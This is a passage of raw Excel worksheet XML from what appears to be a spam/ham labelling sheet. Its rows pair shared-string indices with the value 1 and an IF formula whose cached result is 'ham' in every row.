        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A942" t="s">
        <v>21</v>
      </c>
      <c r="B942">
        <v>1</v>
      </c>
      <c r="C942" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A943" t="s">
        <v>686</v>
      </c>
      <c r="B943">
        <v>1</v>
      </c>
      <c r="C943" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A944" t="s">
        <v>625</v>
      </c>
      <c r="B944">
        <v>1</v>
      </c>
      <c r="C944" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A945" t="s">
        <v>668</v>
      </c>
      <c r="B945">
        <v>1</v>
      </c>
      <c r="C945" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A946" t="s">
        <v>687</v>
      </c>
      <c r="B946">
        <v>1</v>
      </c>
      <c r="C946" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A947" t="s">
        <v>21</v>
      </c>
      <c r="B947">
        <v>1</v>
      </c>
      <c r="C947" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A948" t="s">
        <v>21</v>
      </c>
      <c r="B948">
        <v>1</v>
      </c>
      <c r="C948" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A949" t="s">
        <v>506</v>
      </c>
      <c r="B949">
        <v>1</v>
      </c>
      <c r="C949" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A950" t="s">
        <v>688</v>
      </c>
      <c r="B950">
        <v>1</v>
      </c>
      <c r="C950" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A951" t="s">
        <v>689</v>
      </c>
      <c r="B951">
        <v>1</v>
      </c>
      <c r="C951" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A952" t="s">
        <v>597</v>
      </c>
      <c r="B952">
        <v>1</v>
      </c>
      <c r="C952" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A953" t="s">
        <v>690</v>
      </c>
      <c r="B953">
        <v>1</v>
      </c>
      <c r="C953" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A954" t="s">
        <v>691</v>
      </c>
      <c r="B954">
        <v>1</v>
      </c>
      <c r="C954" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A955" t="s">
        <v>639</v>
      </c>
      <c r="B955">
        <v>1</v>
      </c>
      <c r="C955" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A956" t="s">
        <v>692</v>
      </c>
      <c r="B956">
        <v>1</v>
      </c>
      <c r="C956" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A957" t="s">
        <v>580</v>
      </c>
      <c r="B957">
        <v>1</v>
      </c>
      <c r="C957" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A958" t="s">
        <v>21</v>
      </c>
      <c r="B958">
        <v>1</v>
      </c>
      <c r="C958" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A959" t="s">
        <v>693</v>
      </c>
      <c r="B959">
        <v>1</v>
      </c>
      <c r="C959" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A960" t="s">
        <v>694</v>
      </c>
      <c r="B960">
        <v>1</v>
      </c>
      <c r="C960" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A961" t="s">
        <v>695</v>
      </c>
      <c r="B961">
        <v>1</v>
      </c>
      <c r="C961" t="str">
        <f t="shared" si="14"/>
        <v>ham</v>
      </c>
    </row>
    <row r="962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A962" t="s">
        <v>696</v>
      </c>
      <c r="B962">
        <v>1</v>
      </c>
      <c r="C962" t="str">
        <f t="shared" ref="C962:C1025" si="15">IF(B962="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A963" t="s">
        <v>697</v>
      </c>
      <c r="B963">
        <v>1</v>
      </c>
      <c r="C963" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A964" t="s">
        <v>698</v>
      </c>
      <c r="B964">
        <v>1</v>
      </c>
      <c r="C964" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A965" t="s">
        <v>699</v>
      </c>
      <c r="B965">
        <v>1</v>
      </c>
      <c r="C965" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A966" t="s">
        <v>700</v>
      </c>
      <c r="B966">
        <v>1</v>
      </c>
      <c r="C966" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A967" t="s">
        <v>21</v>
      </c>
      <c r="B967">
        <v>1</v>
      </c>
      <c r="C967" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A968" t="s">
        <v>21</v>
      </c>
      <c r="B968">
        <v>1</v>
      </c>
      <c r="C968" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A969" t="s">
        <v>701</v>
      </c>
      <c r="B969">
        <v>1</v>
      </c>
      <c r="C969" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A970" t="s">
        <v>702</v>
      </c>
      <c r="B970">
        <v>1</v>
      </c>
      <c r="C970" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A971" t="s">
        <v>703</v>
      </c>
      <c r="B971">
        <v>1</v>
      </c>
      <c r="C971" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A972" t="s">
        <v>704</v>
      </c>
      <c r="B972">
        <v>1</v>
      </c>
      <c r="C972" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A973" t="s">
        <v>705</v>
      </c>
      <c r="B973">
        <v>1</v>
      </c>
      <c r="C973" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A974" t="s">
        <v>706</v>
      </c>
      <c r="B974">
        <v>1</v>
      </c>
      <c r="C974" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A975" t="s">
        <v>707</v>
      </c>
      <c r="B975">
        <v>1</v>
      </c>
      <c r="C975" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A976" t="s">
        <v>708</v>
      </c>
      <c r="B976">
        <v>1</v>
      </c>
      <c r="C976" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A977" t="s">
        <v>668</v>
      </c>
      <c r="B977">
        <v>1</v>
      </c>
      <c r="C977" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A978" t="s">
        <v>617</v>
      </c>
      <c r="B978">
        <v>1</v>
      </c>
      <c r="C978" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A979" t="s">
        <v>21</v>
      </c>
      <c r="B979">
        <v>1</v>
      </c>
      <c r="C979" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A980" t="s">
        <v>617</v>
      </c>
      <c r="B980">
        <v>1</v>
      </c>
      <c r="C980" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A981" t="s">
        <v>709</v>
      </c>
      <c r="B981">
        <v>1</v>
      </c>
      <c r="C981" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A982" t="s">
        <v>21</v>
      </c>
      <c r="B982">
        <v>1</v>
      </c>
      <c r="C982" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A983" t="s">
        <v>658</v>
      </c>
      <c r="B983">
        <v>1</v>
      </c>
      <c r="C983" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A984" t="s">
        <v>710</v>
      </c>
      <c r="B984">
        <v>1</v>
      </c>
      <c r="C984" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A985" t="s">
        <v>21</v>
      </c>
      <c r="B985">
        <v>1</v>
      </c>
      <c r="C985" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A986" t="s">
        <v>639</v>
      </c>
      <c r="B986">
        <v>1</v>
      </c>
      <c r="C986" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A987" t="s">
        <v>688</v>
      </c>
      <c r="B987">
        <v>1</v>
      </c>
      <c r="C987" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A988" t="s">
        <v>711</v>
      </c>
      <c r="B988">
        <v>1</v>
      </c>
      <c r="C988" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A989" t="s">
        <v>712</v>
      </c>
      <c r="B989">
        <v>1</v>
      </c>
      <c r="C989" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A990" t="s">
        <v>21</v>
      </c>
      <c r="B990">
        <v>1</v>
      </c>
      <c r="C990" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A991" t="s">
        <v>713</v>
      </c>
      <c r="B991">
        <v>1</v>
      </c>
      <c r="C991" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A992" t="s">
        <v>714</v>
      </c>
      <c r="B992">
        <v>1</v>
      </c>
      <c r="C992" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A993" t="s">
        <v>715</v>
      </c>
      <c r="B993">
        <v>1</v>
      </c>
      <c r="C993" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A994" t="s">
        <v>716</v>
      </c>
      <c r="B994">
        <v>1</v>
      </c>
      <c r="C994" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A995" t="s">
        <v>717</v>
      </c>
      <c r="B995">
        <v>1</v>
      </c>
      <c r="C995" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A996" t="s">
        <v>718</v>
      </c>
      <c r="B996">
        <v>1</v>
      </c>
      <c r="C996" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A997" t="s">
        <v>21</v>
      </c>
      <c r="B997">
        <v>1</v>
      </c>
      <c r="C997" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A998" t="s">
        <v>719</v>
      </c>
      <c r="B998">
        <v>1</v>
      </c>
      <c r="C998" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A999" t="s">
        <v>720</v>
      </c>
      <c r="B999">
        <v>1</v>
      </c>
      <c r="C999" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1000" t="s">
        <v>721</v>
      </c>
      <c r="B1000">
        <v>1</v>
      </c>
      <c r="C1000" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1001" t="s">
        <v>722</v>
      </c>
      <c r="B1001">
        <v>1</v>
      </c>
      <c r="C1001" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1002" t="s">
        <v>722</v>
      </c>
      <c r="B1002">
        <v>1</v>
      </c>
      <c r="C1002" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1003" t="s">
        <v>723</v>
      </c>
      <c r="B1003">
        <v>1</v>
      </c>
      <c r="C1003" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1004" t="s">
        <v>21</v>
      </c>
      <c r="B1004">
        <v>1</v>
      </c>
      <c r="C1004" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1005" t="s">
        <v>651</v>
      </c>
      <c r="B1005">
        <v>1</v>
      </c>
      <c r="C1005" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1006" t="s">
        <v>724</v>
      </c>
      <c r="B1006">
        <v>1</v>
      </c>
      <c r="C1006" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1007" t="s">
        <v>725</v>
      </c>
      <c r="B1007">
        <v>1</v>
      </c>
      <c r="C1007" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1008" t="s">
        <v>726</v>
      </c>
      <c r="B1008">
        <v>1</v>
      </c>
      <c r="C1008" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1009" t="s">
        <v>726</v>
      </c>
      <c r="B1009">
        <v>1</v>
      </c>
      <c r="C1009" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1010" t="s">
        <v>727</v>
      </c>
      <c r="B1010">
        <v>1</v>
      </c>
      <c r="C1010" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1011" t="s">
        <v>597</v>
      </c>
      <c r="B1011">
        <v>1</v>
      </c>
      <c r="C1011" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1012" t="s">
        <v>21</v>
      </c>
      <c r="B1012">
        <v>1</v>
      </c>
      <c r="C1012" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1013" t="s">
        <v>728</v>
      </c>
      <c r="B1013">
        <v>1</v>
      </c>
      <c r="C1013" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1014" t="s">
        <v>729</v>
      </c>
      <c r="B1014">
        <v>1</v>
      </c>
      <c r="C1014" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1015" t="s">
        <v>730</v>
      </c>
      <c r="B1015">
        <v>1</v>
      </c>
      <c r="C1015" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1016" t="s">
        <v>731</v>
      </c>
      <c r="B1016">
        <v>1</v>
      </c>
      <c r="C1016" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1017" t="s">
        <v>732</v>
      </c>
      <c r="B1017">
        <v>1</v>
      </c>
      <c r="C1017" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1018" t="s">
        <v>733</v>
      </c>
      <c r="B1018">
        <v>1</v>
      </c>
      <c r="C1018" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1019" t="s">
        <v>734</v>
      </c>
      <c r="B1019">
        <v>1</v>
      </c>
      <c r="C1019" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1020" t="s">
        <v>21</v>
      </c>
      <c r="B1020">
        <v>1</v>
      </c>
      <c r="C1020" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1021" t="s">
        <v>735</v>
      </c>
      <c r="B1021">
        <v>1</v>
      </c>
      <c r="C1021" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1022" t="s">
        <v>736</v>
      </c>
      <c r="B1022">
        <v>1</v>
      </c>
      <c r="C1022" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1023" t="s">
        <v>724</v>
      </c>
      <c r="B1023">
        <v>1</v>
      </c>
      <c r="C1023" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1024" t="s">
        <v>737</v>
      </c>
      <c r="B1024">
        <v>1</v>
      </c>
      <c r="C1024" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1025" t="s">
        <v>738</v>
      </c>
      <c r="B1025">
        <v>1</v>
      </c>
      <c r="C1025" t="str">
        <f t="shared" si="15"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1026" t="s">
        <v>739</v>
      </c>
      <c r="B1026">
        <v>1</v>
      </c>
      <c r="C1026" t="str">
        <f t="shared" ref="C1026:C1089" si="16">IF(B1026="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1027" t="s">
        <v>21</v>
      </c>
      <c r="B1027">
        <v>1</v>
      </c>
      <c r="C1027" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1028" t="s">
        <v>740</v>
      </c>
      <c r="B1028">
        <v>1</v>
      </c>
      <c r="C1028" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1029" t="s">
        <v>608</v>
      </c>
      <c r="B1029">
        <v>1</v>
      </c>
      <c r="C1029" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1030" t="s">
        <v>741</v>
      </c>
      <c r="B1030">
        <v>1</v>
      </c>
      <c r="C1030" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1031" t="s">
        <v>742</v>
      </c>
      <c r="B1031">
        <v>1</v>
      </c>
      <c r="C1031" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1032" t="s">
        <v>743</v>
      </c>
      <c r="B1032">
        <v>1</v>
      </c>
      <c r="C1032" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1033" t="s">
        <v>744</v>
      </c>
      <c r="B1033">
        <v>1</v>
      </c>
      <c r="C1033" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1034" t="s">
        <v>745</v>
      </c>
      <c r="B1034">
        <v>1</v>
      </c>
      <c r="C1034" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1035" t="s">
        <v>746</v>
      </c>
      <c r="B1035">
        <v>1</v>
      </c>
      <c r="C1035" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1036" t="s">
        <v>747</v>
      </c>
      <c r="B1036">
        <v>1</v>
      </c>
      <c r="C1036" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1037" t="s">
        <v>21</v>
      </c>
      <c r="B1037">
        <v>1</v>
      </c>
      <c r="C1037" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1038" t="s">
        <v>748</v>
      </c>
      <c r="B1038">
        <v>1</v>
      </c>
      <c r="C1038" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1039" t="s">
        <v>749</v>
      </c>
      <c r="B1039">
        <v>1</v>
      </c>
      <c r="C1039" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1040" t="s">
        <v>750</v>
      </c>
      <c r="B1040">
        <v>1</v>
      </c>
      <c r="C1040" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1041" t="s">
        <v>751</v>
      </c>
      <c r="B1041">
        <v>1</v>
      </c>
      <c r="C1041" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1042" t="s">
        <v>21</v>
      </c>
      <c r="B1042">
        <v>1</v>
      </c>
      <c r="C1042" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1043" t="s">
        <v>752</v>
      </c>
      <c r="B1043">
        <v>1</v>
      </c>
      <c r="C1043" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1044" t="s">
        <v>753</v>
      </c>
      <c r="B1044">
        <v>1</v>
      </c>
      <c r="C1044" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1045" t="s">
        <v>754</v>
      </c>
      <c r="B1045">
        <v>1</v>
      </c>
      <c r="C1045" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1046" t="s">
        <v>755</v>
      </c>
      <c r="B1046">
        <v>1</v>
      </c>
      <c r="C1046" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1047" t="s">
        <v>756</v>
      </c>
      <c r="B1047">
        <v>1</v>
      </c>
      <c r="C1047" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1048" t="s">
        <v>757</v>
      </c>
      <c r="B1048">
        <v>1</v>
      </c>
      <c r="C1048" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1049" t="s">
        <v>757</v>
      </c>
      <c r="B1049">
        <v>1</v>
      </c>
      <c r="C1049" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1050" t="s">
        <v>696</v>
      </c>
      <c r="B1050">
        <v>1</v>
      </c>
      <c r="C1050" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1051" t="s">
        <v>639</v>
      </c>
      <c r="B1051">
        <v>1</v>
      </c>
      <c r="C1051" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1052" t="s">
        <v>758</v>
      </c>
      <c r="B1052">
        <v>1</v>
      </c>
      <c r="C1052" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1053" t="s">
        <v>759</v>
      </c>
      <c r="B1053">
        <v>1</v>
      </c>
      <c r="C1053" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1054" t="s">
        <v>760</v>
      </c>
      <c r="B1054">
        <v>1</v>
      </c>
      <c r="C1054" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1055" t="s">
        <v>761</v>
      </c>
      <c r="B1055">
        <v>1</v>
      </c>
      <c r="C1055" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1056" t="s">
        <v>762</v>
      </c>
      <c r="B1056">
        <v>1</v>
      </c>
